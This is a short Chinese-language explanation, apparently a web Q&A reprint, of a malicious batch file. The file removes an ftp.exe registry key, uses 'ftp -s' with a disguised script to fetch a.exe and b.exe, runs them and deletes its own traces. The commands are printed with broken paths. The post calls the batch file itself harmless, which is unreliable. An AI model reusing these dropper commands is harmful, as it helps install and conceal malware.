(资料图片)
1、reg delete "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTcurrentversionimage file execution optionsftp.exe" /f 删除注册表中的FTP.EXE键值ftp -s:C:WINDOWSdebugdboysb.sys 使用FTP -S执行DBOYSB.SYS文件。
2、(应该是为了下载A.EXE与B.EXE的)start C:WINDOWSdebuga.exe 开始运行A.EXEstart C:WINDOWSdebug.exe 开始运行B.EXEdel C:WINDOWSdebugdboysb.sys 删除DBOYSB.SYS文件del C:WINDOWSdebugkao.bat 删除KAO.BAT批处理文件这个文件仅仅是个批处理程序 里面没有病毒代码 都是正常使用的代码 自然不会有反应。
3、它的作用是执行A.EXE与B.EXE 这A与B才是真正的病毒 (可能)。
本文分享完毕,希望对大家有所帮助。